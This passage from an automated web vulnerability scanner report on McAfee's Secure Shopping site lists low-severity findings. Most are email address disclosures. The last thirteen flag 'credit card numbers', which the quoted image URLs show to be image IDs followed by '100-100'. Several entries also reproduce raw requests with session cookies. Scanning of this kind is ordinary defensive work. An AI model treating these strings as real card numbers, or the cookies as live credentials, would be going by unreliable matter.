secureshopping@mcafee.com

Request

Response

5.125. http://secureshopping.mcafee.com/browse/computers/accessories/mp3-player-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/mp3-player-accessories/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.126. http://secureshopping.mcafee.com/browse/computers/accessories/notebook-pda-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/notebook-pda-accessories/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.127. http://secureshopping.mcafee.com/browse/computers/accessories/paper-supplies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/paper-supplies/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.128. http://secureshopping.mcafee.com/browse/computers/accessories/printer-supplies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/printer-supplies/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.129. http://secureshopping.mcafee.com/browse/computers/accessories/racks,-mounts-cabinets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/racks,-mounts-cabinets/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.130. http://secureshopping.mcafee.com/browse/computers/accessories/remote-controls/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/remote-controls/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.131. http://secureshopping.mcafee.com/browse/computers/accessories/scanner-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/scanner-accessories/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.132. http://secureshopping.mcafee.com/browse/computers/accessories/storage-media/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/storage-media/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.133. http://secureshopping.mcafee.com/browse/computers/cables-adapters/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cables-adapters/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.134. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.135. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/cases/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/cases/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.136. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/cpu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/cpu/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.137. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/motherboards/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/motherboards/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.138. http://secureshopping.mcafee.com/browse/computers/desktops/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/desktops/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.139. http://secureshopping.mcafee.com/browse/computers/graphics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/graphics/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.140. http://secureshopping.mcafee.com/browse/computers/handhelds-pda/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/handhelds-pda/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.141. http://secureshopping.mcafee.com/browse/computers/input-devices/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.142. http://secureshopping.mcafee.com/browse/computers/input-devices/joysticks-gamepads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/joysticks-gamepads/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.143. http://secureshopping.mcafee.com/browse/computers/input-devices/keyboards/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/keyboards/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.144. http://secureshopping.mcafee.com/browse/computers/input-devices/mice/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/mice/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.145. http://secureshopping.mcafee.com/browse/computers/monitors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/monitors/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.146. http://secureshopping.mcafee.com/browse/computers/network-communications/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.147. http://secureshopping.mcafee.com/browse/computers/network-communications/adapters-interfaces/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/adapters-interfaces/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.148. http://secureshopping.mcafee.com/browse/computers/network-communications/bridges,-routers,-gateways/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/bridges,-routers,-gateways/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.149. http://secureshopping.mcafee.com/browse/computers/network-communications/modems/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/modems/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.150. http://secureshopping.mcafee.com/browse/computers/network-communications/network-hubs-switches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/network-hubs-switches/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.151. http://secureshopping.mcafee.com/browse/computers/servers/terminals-thin-clients/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/servers/terminals-thin-clients/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.152. http://secureshopping.mcafee.com/browse/electronics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/electronics/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.153. http://secureshopping.mcafee.com/browse/electronics/digital-cameras/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/electronics/digital-cameras/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.154. http://secureshopping.mcafee.com/browse/food-wine/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/food-wine/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.155. http://secureshopping.mcafee.com/browse/health-beauty/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/health-beauty/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.156. http://secureshopping.mcafee.com/browse/home-garden/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/home-garden/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.157. http://secureshopping.mcafee.com/browse/jewelry-watches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/jewelry-watches/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.158. http://secureshopping.mcafee.com/browse/magazines/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/magazines/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.159. http://secureshopping.mcafee.com/browse/movies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/movies/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.160. http://secureshopping.mcafee.com/browse/music/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/music/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.161. http://secureshopping.mcafee.com/browse/office-products/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/office-products/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.162. http://secureshopping.mcafee.com/browse/software/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/software/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.163. http://secureshopping.mcafee.com/browse/sports-outdoors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/sports-outdoors/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.164. http://secureshopping.mcafee.com/browse/toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/toys/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.165. http://secureshopping.mcafee.com/browse/toys/cars,-trains-planes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/toys/cars,-trains-planes/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.166. http://secureshopping.mcafee.com/browse/video-games/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/video-games/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.167. http://secureshopping.mcafee.com/canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.168. http://secureshopping.mcafee.com/hot-products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/hot-products

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.169. http://secureshopping.mcafee.com/legal.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/legal.jsp

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:16 GMT
Content-Length: 11239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>Legal Disclaimer - McAfee Secure Shopping</title>
<meta name="descrip
...[SNIP]...
<a target=_top class=footer1 href="mailto:secureshopping@mcafee.com">
...[SNIP]...

5.170. http://secureshopping.mcafee.com/merchants-intro.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/merchants-intro.jsp

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:16 GMT
Content-Length: 12044

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>Merchants - McAfee Secure Shopping</title>
<meta name="description"
...[SNIP]...
<a target=_top class=footer1 href="mailto:secureshopping@mcafee.com">
...[SNIP]...

5.171. http://secureshopping.mcafee.com/popular-searches previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/popular-searches

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:13 GMT
Content-Length: 48761

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping</title>
<meta name="description" content="Your
...[SNIP]...
<a target=_top class=footer1 href="mailto:secureshopping@mcafee.com">
...[SNIP]...

5.172. http://secureshopping.mcafee.com/rss/browse/baby/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/rss/browse/baby/

Issue detail

The following email address was disclosed in the response:

support@mcafeesecure.com

Request

GET /rss/browse/baby/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Cache-Control: max-age=360
Content-Type: text/xml; charset=UTF-8
Connection: close
Date: Sat, 25 Dec 2010 03:47:47 GMT
Content-Length: 17904

<?xml version="1.0" ?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel><title>McAfee SECURE Shopping | baby</title><lastBuildDate>Fri, 24 Dec 2010 00:00</lastBuildDate><descrip
...[SNIP]...
<webmaster>support@mcafeesecure.com</webmaster>
...[SNIP]...

5.173. http://secureshopping.mcafee.com/rss/browse/computers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/rss/browse/computers/

Issue detail

The following email address was disclosed in the response:

support@mcafeesecure.com

Request

GET /rss/browse/computers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Cache-Control: max-age=360
Content-Type: text/xml; charset=UTF-8
Connection: close
Date: Sat, 25 Dec 2010 03:47:57 GMT
Content-Length: 16657

<?xml version="1.0" ?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel><title>McAfee SECURE Shopping | netbook</title><lastBuildDate>Fri, 24 Dec 2010 00:00</lastBuildDate><desc
...[SNIP]...
<webmaster>support@mcafeesecure.com</webmaster>
...[SNIP]...

5.174. http://secureshopping.mcafee.com/rss/hot-products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/rss/hot-products

Issue detail

The following email address was disclosed in the response:

support@mcafeesecure.com

Request

GET /rss/hot-products HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Cache-Control: max-age=360
Content-Type: text/xml; charset=UTF-8
Connection: close
Date: Sat, 25 Dec 2010 03:47:45 GMT
Content-Length: 46995

<?xml version="1.0" ?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel><title>McAfee SECURE Shopping Hot Products</title><lastBuildDate>Fri, 24 Dec 2010 00:00</lastBuildDate><d
...[SNIP]...
<webmaster>support@mcafeesecure.com</webmaster>
...[SNIP]...

5.175. http://secureshopping.mcafee.com/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.176. http://secureshopping.mcafee.com/shop/holiday-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/shop/holiday-cards

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.177. http://secureshopping.mcafee.com/shop/holiday-gifts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/shop/holiday-gifts

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

5.178. http://secureshopping.mcafee.com/shop/holiday-home-decor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/shop/holiday-home-decor

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

6. Credit card numbers disclosed previous next
There are 27 instances of this issue:

/
/browse/baby/apparel/leggings-tights/
/browse/baby/bathing/bath-tubs/
/browse/baby/bedding/bumper-pads/
/browse/baby/diapering/skin-care/
/browse/baby/furniture/high-chairs/
/browse/baby/safety/baby-monitors/
/browse/baby/safety/safety-kits/
/browse/baby/toys/
/browse/baby/toys/learning-toys/
/browse/baby/travel/baby-carriers/
/browse/clothing-accessories/
/browse/computers/accessories/batteries-chargers/
/browse/computers/accessories/camcorder-accessories/
/browse/computers/accessories/headphones/
/browse/computers/accessories/monitor-accessories/
/browse/computers/accessories/mp3-player-accessories/
/browse/computers/accessories/notebook-pda-accessories/
/browse/computers/accessories/paper-supplies/
/browse/computers/accessories/remote-controls/
/browse/computers/accessories/scanner-accessories/
/browse/computers/cables-adapters/
/browse/computers/handhelds-pda/
/browse/computers/monitors/
/browse/computers/network-communications/bridges,-routers,-gateways/
/browse/music/
/hot-products

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

6.1. http://secureshopping.mcafee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/

Issue detail

The following credit card number was disclosed in the response:

4004274341001005

Request

GET / HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293247781225-3-y4N6; path=/; expires=Sun, 25-Dec-2011 03:29:40 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:29:40 GMT
Content-Length: 40883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping - Secure Online Shopping</title>
<meta name="d
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s4/400427434-100-100-5-0/" border=0 alt="Basic Stretch Denim Leggings">
...[SNIP]...

6.2. http://secureshopping.mcafee.com/browse/baby/apparel/leggings-tights/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/leggings-tights/

Issue detail

The following credit card number was disclosed in the response:

5936962481001005

Request

Response

6.3. http://secureshopping.mcafee.com/browse/baby/bathing/bath-tubs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/bath-tubs/

Issue detail

The following credit card number was disclosed in the response:

6500790431001005

Request

Response

6.4. http://secureshopping.mcafee.com/browse/baby/bedding/bumper-pads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/bumper-pads/

Issue detail

The following credit card numbers were disclosed in the response:

5443987591001005
5446649701001005

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:04 GMT
Content-Length: 68127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bumper Pads at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s9/544398759-100-100-5-0/" border=0 alt="Tadpoles Indian Summer Girl's 4 piece Embroidered Crib Set (4 Piece )">
...[SNIP]...
<img width=100 height=100 src="http://image.become.com/imageserver/s0/544664970-100-100-5-0/" border=0 alt="Tadpoles Birds of Paradise 6pc Crib Set -- brown">
...[SNIP]...

6.5. http://secureshopping.mcafee.com/browse/baby/diapering/skin-care/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/skin-care/

Issue detail

The following credit card number was disclosed in the response:

4229642991001005

Request

Response

6.6. http://secureshopping.mcafee.com/browse/baby/furniture/high-chairs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/furniture/high-chairs/

Issue detail

The following credit card number was disclosed in the response:

6584286991001005

Request

Response

6.7. http://secureshopping.mcafee.com/browse/baby/safety/baby-monitors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/baby-monitors/

Issue detail

The following credit card number was disclosed in the response:

5585220041001005

Request

Response

6.8. http://secureshopping.mcafee.com/browse/baby/safety/safety-kits/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/safety/safety-kits/

Issue detail

The following credit card number was disclosed in the response:

5443734001001005

Request

Response

6.9. http://secureshopping.mcafee.com/browse/baby/toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/

Issue detail

The following credit card number was disclosed in the response:

5829103151001005

Request

Response

6.10. http://secureshopping.mcafee.com/browse/baby/toys/learning-toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/toys/learning-toys/

Issue detail

The following credit card number was disclosed in the response:

6524389871001005

Request

Response

6.11. http://secureshopping.mcafee.com/browse/baby/travel/baby-carriers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/travel/baby-carriers/

Issue detail

The following credit card number was disclosed in the response:

4321614641001005

Request

Response

6.12. http://secureshopping.mcafee.com/browse/clothing-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/clothing-accessories/

Issue detail

The following credit card number was disclosed in the response:

4004274341001005

Request

Response

6.13. http://secureshopping.mcafee.com/browse/computers/accessories/batteries-chargers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/batteries-chargers/

Issue detail

The following credit card number was disclosed in the response:

5847527191001005

Request

Response

